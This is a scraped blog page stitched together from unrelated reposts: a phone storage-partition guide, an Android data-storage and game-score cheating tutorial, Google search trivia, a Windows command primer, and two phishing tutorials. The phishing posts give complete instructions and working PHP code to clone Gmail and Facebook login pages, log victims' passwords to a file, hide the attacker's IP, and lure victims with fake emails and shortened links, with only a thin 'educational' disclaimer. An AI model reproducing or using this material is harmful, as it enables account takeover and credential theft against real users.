Badblog

welcome to our blog

We are Learncodz.


Posts

Comments

The Team

Blog Codz Author

Connect With Us

Join To Connect With Us

Portfolio

  • READ EVERYTHING CAREFULLY
    I Will Not Responsible For Any Brick or Any Problem So Do It At Your Own Risk.

    This Will Extend your Device's /data partition (Phone Storage) from 1 GB to 1.5 GB or 2.5 GB..
    This will make your Internal Storage smaller..

    Default -- 1GB Phone Storage -- 1.773GB Internal Card

    500MB patch -- 1.5GB Phone Storage -- 1.273GB Internal Card

    1.5GB patch -- 2.5GB Phone Storage -- 273MB Internal Card

    Before Doing Anything :-

    Quote:

    MOST IMPORTANT :- DISABLE SWAPPING IF YOU'VE SWAPPED YOUR MEMORIES,
    OTHERWISE EXTERNAL CARD WILL BE DESTROYED.
    Flash This to Disable SWAPPING.. AND CROSS CHECK IF MEMORIES ARE BACK TO NORMAL OR NOT

    Backup Data and System Through CWM/TWRP to EXTERNAL Card
    Back Up Everything From Internal SD to your system, Internal SD will be formatted In this Procedure
    V-COM Drivers Should Be Installed In Order To Use SPF Tools
    Settings should accept new values, For checking Go to Settings>app and Settings>storage, If its not Force closing then its fine.
    and if It is force closing then Flash patched settings.apk
    Make Sure Battery is more than 50%
    Things Needed :-

    Quote:

    S.P. Flash Tools
    EBR1 & EBR2 Files
    Scatter File
    meteos-mtk6589-rom-edit(modded for A116).apk (Credit - meteos)
    A116 Canvas HD (ROOTED)
    Data Cable
    PC
    Download:--

    Quote:
    S.P. Flash Tool
    Patched EBR Files 500MB
    Patched EBR Files 1.5GB
    Scatter File
    Modded APK
    Disable Swap Flashable
    Patched Settings App(only for 4.1) if 4.2 setting gives FC PM me the settings.apk from /system/app
    Credits ---->
    Guide For Installing V-Com Driver Click Here Credits -----> Abhishek Kumar

    Guide For Using S.P. Flash tool Click Here Credits -----> DR_MOOSAVI

    MT6589 ROM EDIT APK Credits ------> Meteos

  • Background

    Device loss is a very common problem with mobile devices. An attacker who has physical access to the device can have access to personal as well as corporate data stored in the device. The situation could be worse if the device is rooted. Keeping this in mind, if the data storage mechanisms being used by an application are not implemented properly, it may lead to serious attacks.
    Android local data storage techniques

    Developers can store data in Android applications locally in various ways, as shown below.

    Shared Preferences
    Shared Preferences are XML files to store private primitive data in key-value pairs. Data Types include Booleans, floats, ints, longs, and strings.

    SQLite Databases
    SQLite databases are lightweight file-based databases. They usually have the extension “.db” or “.sqlite”. Android provides full support for SQLite databases. Databases we create in the application will be accessible to any class in the application. Other apps cannot access them.

    Internal Storage
    Internal storage is another way in which we can save files directly on the device. By default, files saved to internal storage are private to your application, and other applications cannot access them. When the user uninstalls your application, these files are removed.

    External Storage
    External storage is a location that you can use to save files. This can be a removable storage media (such as an external SD card) or an internal (non-removable) storage. External SD cards are world readable.

    In the next section, let’s see how developers can use Shared Preferences to store data on a device, and then we will see how an attacker can access this data from a device as well.

    Prerequisites to follow the steps

    Computer with Android SDK installed
    A rooted mobile device/emulator to install the apps
    Test application’s functionality

    I have developed a test application to demonstrate the issue. You can download the sample application from download section. After downloading the application, install it on a rooted Android device or in an emulator.

    App can be installed with adb using the following command:

    adb install <name of the apk>.apk

    Figure 1

    All the applications have a feature to store data inside the application. When we launch it, it appears as shown in the figure below (Shared Preferences app is used here).

    Shared preferences

    Lets launch the sharedpreferences app and insert some sample data into the username and password fields.

    Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:
    Dual Certification - CEH and CPT
    5 days of Intensive Hands-On Labs
    Expert Instruction
    CTF exercises in the evening
    Most up-to-date proprietary courseware available
    VIEW ETHICAL HACKING
    Shared preferences are created in Android applications using the SharedPreferences class. Below is the piece of code used in the sample application given for download.

    Figure 3

    As we can see in the above figure, we have created a SharedPreferences instance and then we are using it to insert data into the xml file using Editor object.

    Now, let’s go ahead and see where this data is stored in the application.

    The common location where SharedPreferences are stored in Android apps is:

    /data/data/<package name>/shared_prefs/<filename.xml>

    So, let’s navigate and inspect the above path to see if there are any shared preferences created in this application.

    Figure 4

    As we can see in the above figure, there is a folder named “shared_prefs”. This gets created when an app is using shared preferences in it. We can change the directory to shared_prefs and use the “cat” command to look at the contents of this application right away.

    If we want to get the xml file onto our local machine, we can pull the file as shown below.

    Figure 5

    As we can see in the above figure, “userdetails.xml” file has been copied onto the local machine. We can now see the contents of the file as shown in Figure 6.

    Cracking gaming applications to modify the scores

    Most of the games available for mobile platforms are native applications and do not require the Internet while playing them. So, it is obvious that the statistics associated with the game would be stored locally somewhere on the device itself. On a rooted device, if we explore the local file system for the files storing these game scores, we can easily modify them and bypass the limitations.

    Let’s take a popular application named StickCricket. This game is very popular on the Internet and personally I love it because of the difficulty in achieving high scores. Let’s see how we can modify the scores of this application from the backend.

    Prerequisites

    Device must be rooted
    Droid Explorer tool for analyzing the file system
    ADB access on the device
    When we launch the StickCricket application to play it, it has an activity which shows the best score so far. Generally, it is difficult to score 130+ from 5 overs.

    Now, let’s see how we can crack this application to increase the score.

    Let’s navigate to the application’s local file system to see the files where the application can store its data. This is shown in the following figure.

    We have opened an adb shell on the device and then elevated the privileges using the “su” command. Every application installed on an Android device will have all its application-specific data inside “/data/data” directory. So, we have navigated to /data/data/com.sticksports.stickcricket/.

    If we execute the “ls” command here, we can see some directories where the application stores its data. The directory of our interest here is “shared_prefs“. Now, let’s navigate to the shared_prefs directory to see if there are any interesting files inside this. This is shown in the figure below.

    We have navigated to shared_prefs directory and listed all the files inside this directory. There are three XML files inside the shared_prefs directory. If we do some analysis on these three files, by looking at the contents using the “cat” command, it is obvious that “Cocos2dxPrefsFile.xml” is the file which is being used to store all the scores. Now, we have to replace the existing scores in this file to the scores we wish to have.

    To do this, I am using a tool called “Droid Explorer” in Windows.

    Droid Explorer can be downloaded from their official website: >http://de.codeplex.com/.

    Droid Explorer is a nice tool to interact with the device using Windows Explorer. Its GUI makes our life easier to perform various tasks such as moving files from device to machine, uninstalling applications, making a backup, etc.

    Below are the steps.

    Connect the Android device to the machine.
    Launch Droid Explorer and navigate to the target directory.

    Pull the file onto the device and open it in a text editor

    In the above figure, we have changed the highest score from 129 to 180.

    Now, delete the Cocos2dxPrefsFile.xml file from the Android device using Droid Explorer.

    Push the modified “Cocos2dxPrefsFile.xml” file from the machine to device using DroidExplorer.
    Launch the game again. Now we should be able to see the modified score updated in the application as shown below.

  • Google search engine is best known for bringing up relevant web pages to the search terms you type in, due to its page rank algorithm.

    However Google has built in some other lesser-known features. The Telegraph has scoured Google's search function for some of those elements.

    Some of them are just quirky: try typing in "do a barrel roll" or "tilt" into the search bar for instance.

    Others include useful functions such a translator function which enables you to type in a word in one language to find its equivalent in another.

    There are also homages video games, such as from the 1980's brand Atari and the so-called 'zerg rush' feature in many titles.

    Atari Breakout game on Google search

    There are also useful functions such as a calculator and weather forecasts.

    Google's calculator function is far more powerful than most people realise.

    Watch the video to find out more about Google search's features.

  • This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

    Steps for Creating Phishing or Fake web Page:

    Step 1:

    Go to the gmail.com.  Save the Page as "complet HTML" file

    Step 2:
    Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

    Step3:
    Upload those image to tinypic or photobucker.com.  copy the url of each image.

    Step4:
    Open the HTML file in Wordpad.
    Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
    Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

    Step 5:
    Search for the

    action="https://www.google.com/accounts/ServiceLoginAuth"

    Replace it with

    action="http://yoursite urlhere/login.php"

    save the file.
    Step6:
    Now you need to create login.php
    so you need to open the notepad and type as
    <?php
    header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
    $handle = fopen("pswrds.txt", "a");
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    save it

    Step 7:
    open the notepad and just save the file as "pswrds.txt" without any contents.

    Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
    Note:  that web hosting service must has php feature.
    Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
    use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.

    Step 8:
    create an email with gmail keyword.
    like : gmailburger@gmail.com

    Step 9:
      Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.

    Note:
    For user to believe change Your phishing web page url with any of free short url sites.
    Like : co.nr, co.cc,cz.cc
    This will make users to believe that it is correct url.

  • In this tutorial i will guide you to top 10 important and famous command prompt commands with their usage.  

    1. ipconfig :
                      This is the top most command for seeing the ip address,subnet mask and default gateway also includes display and flush DNS cache, re-register the system name in DNS..  This will most useful tool for viewing and troubleshooting TCP/IP problem.

    To view ip ,subnet mask address : ipconfig
    To view all TCP/IP information, use: ipconfig /all
    To view the local DNS cache, use: ipconfig /displaydns
    To delete the contents in the local DNS cache, use: ipconfig /flushdns

    2.systeminfo

    Have a need to display operating system configuration information for a local or remote machine, including service pack levels? Then systeminfo is the tool to use. When I need to connect to a system that I am not familiar with, this is the first tool I run. The output of this command gives me all the info I need including: host name, OS type, version, product ID, install date, boot time and hardware info (processor and memory). Also knowing what hot fixes are installed can be a big help when troubleshooting problems. This tool can be used to connect to a machine remotely using the following syntax: SYSTEMINFO /S system /U user

    3. tasklist and taskkill

    If you work with Task Manager (ctrl+alt+del) ,you can easily understand this.  Task list is list of task which are running on windows currently.  If you open any application,it will be added to task.

    To List the Tasks type in cmd as :

              tasklist
    This will show the list of task which are running as shown in the picture

    To stop the Process or task ,there is two methods :
    Using Image Name:
       We can kill the task using its Image Name as follows:
                           tasklist /im notepad.exe

    Using Process Id:
      we can stop the process using its process id as follows :
                    tasklist /pid 1852

    4. type
    type is used to read the text document in command prompt .  You can read multiple text in continuously

    type filename.txt

    5.netstat
    Need to know who (or what) is making a connection to your computer? Then netstat is the tool you want to run. The output provides valuable information of all connections and listening ports, including the executable used in the connections. In additon to the above info, you can view Ethernet statistics, and resolve connecting host IP Addresses to a fully qualified domain name. I usually run the netstat command using the -a (displays all connection info), -n (sorts in numerical form) and -b (displays executable name) switches.

    6.net command
    Although this tool is more known as a command, the net command is really like a power drill with different bits and is used to update, fix, or view the network or network settings.
    It is mostly used for viewing (only services that are started), stopping and starting services:
    net stop server
    net start server
    net start (display running services)
    and for connecting (mapping) and disconnecting with shared network drives:
    net use m: \\myserver\sharename
    net use m: \\myserver\sharename /delete
    Other commands used with net command are, accounts (manage user accounts), net print (manage print jobs), and net share (manage shares).
    Below are all the options that can be used with the net command.
    [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |HELPMSG | LOCALGROUP | PAUSE | PRINT | SESSION | SHARE | START |STATISTICS | STOP | TIME | USE | USER | VIEW ]

    7 - nslookup - With the Internet, DNS (Domain Name Service) is the key for allowing us to use friendly names when surfing the web instead of needing to remember IP Addresses. But when there are problems, nslookup can be a valuable tool for testing and troubleshooting DNS servers.
    Nslookup can be run in two modes: interactive and noninteractive. Noninteractive mode is useful when only a single piece of data needs to be returned. For example, to resolve google.com:



    To use the interactive mode, just type nslookup at the prompt. To see all available options, type help while in interactive mode.



    Don't let the help results intimidate you. Nslookup is easy to use. Some of the options I use when troubleshooting are:
    set ds (displays detailed debugging information of behind the scenes communication when resolving an host or IP Address).
    set domain (sets the default domain to use when resolving, so you don't need to type the fully qualified name each time).
    set type (sets the query record type that will be returned, such as A, MX, NS)
    server NAME (allows you to point nslookup to use other DNS servers than what is configured on your computer)
    To exit out of interactive mode, type exit .

    8 - ping and tracert - These tools can be helpful with connectivity to other systems. Ping will test whether a particular host is reachable across an IP network, while tracert (traceroute) is used to determine the route taken by packets across an IP network.
    To ping a system just type at the prompt: ping www.google.com. By default, ping will send three ICMP request to the host and listen for ICMP “echo response” replies. Ping also includes switches to control the number of echo requests to send (-n ), and to resolve IP addresses to hostname (-a ).
    To use tracert, type at the prompt: tracert www.google.com. You can force tracert to not resolve address to hostnames by using the -d switch, or set the desired timeout (milliseconds) for each reply using -w switch.
    9 - gpresult - Used mostly in environments that implement group poicies, gpresults (Group Policy Results) verifies all policy settings in effect for a specific user or computer. The command is simple to use, just enter gpresults at the prompt. It can also be used to connect to computers remotely using the /S and /U switches.
    10 - netsh - Without a doubt the most powerful command line tool available in Windows. Netsh is like the swiss army knife for configuring and monitoring Windows computers from the command prompt. It capabilities include:
    Configure interfaces
    Configure routing protocols
    Configure filters
    Configure routes
    Configure remote access behavior for Windows-based remote access routers that are running the Routing and Remote Access Server (RRAS) Service
    Display the configuration of a currently running router on any computer
    Some examples of what you can do with netsh:
    Enable or disable Windows firewall:
    netsh firewall set opmode disable
    netsh firewall set opmode disable
    Enable or disable ICMP Echo Request (for pinging) in Windows firewall:
    netsh firewall set icmpsetting 8 enable
    netsh firewall set icmpsetting 8 disable
    Configure your NIC to automatically obtain an IP address from a DHCP server:
    netsh interface ip set address "Local Area Connection" dhcp
    (For the above command, if your NIC is named something else, use netsh interface ip show config and replace the name at Local Area Connection).
    As you can see netsh can do alot. Instead of re-inventing the wheel, check out the following Microsoft article for more info on netsh.

  • BTS' readers used to ask me how to hack Facebook accounts.  Most of the people curious to know how hackers take control of their accounts.  In this post, let me clarify those doubts.

    Here, i am going to explain one of the popular social engineering attack(luring user to do whatever you asked to do.), called "phishing" .

    Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

    Phishing WebPage:
    Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

    Let me explain how to create a facebook phishing page.

    Step 1:
    Go to facebook and right click on website .  Select "View source" and copy the code to notepad.

    Step2:
    Now search (Press ctrl +f) for keyword "action"  in that code.

    You fill find the code like this:

    Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.

    In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

    To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

    Save the file as index.html.

    Step 3:
    Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

    Open the notepad and type the following code:
    <?php
    header("Location: http://www.Facebook.com/login.php ");
    $handle = fopen("pswrds.txt", "a");
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

    save this file as "login.php"

    Step 4:
    Open the notepad and just save the file as "pswrds.txt" (without any contents).

    Step 5:
    To host your phishing page, you may need a webhosting.  You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.  Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_name.webhosting_domain.com'.

    Now upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. Make sure your fake page is working or not by vising your url.

    Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.

    Note:
    The above article is for educational purpose only, written for beginners of Ethical hacking or Pentesting to understand the basics so that it will be easy for them to understanding advanced topics.

    I've also written an article that gives few security tips to protect yourself from being victim of such kind of phishing pages.  Here you can find it: How to prevent from Phishing Web page?

Comments

The Visitors says
Download Free Software Latest Version